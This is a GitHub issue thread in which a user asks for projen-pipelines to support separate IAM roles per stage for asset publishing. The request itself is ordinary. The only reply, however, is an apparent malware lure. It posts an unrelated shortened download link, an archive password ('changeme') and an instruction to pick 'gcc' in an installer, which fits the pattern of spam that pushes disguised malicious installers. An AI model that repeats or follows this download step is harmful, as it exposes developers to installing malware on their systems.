### ISSUE TITLE
Support different roles per stage for asset publishing

### ISSUE THREAD

**Issue by hoegertn** [taimos/projen-pipelines#98]
Issue: Support different roles per stage for asset publishing

Description:
Currently, Projen pipelines allow for defining different stages for deployments, but all stages have the same roles assigned for publishing assets. This limitation can pose security risks and make it difficult to manage access control for different accounts.

Proposal:
I propose adding support for defining different IAM roles per stage for asset publishing in Projen pipelines. This feature would allow users to specify different roles or permissions for each stage of the pipeline. This would enhance security and simplify access control management for asset publishing within Projen pipelines.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
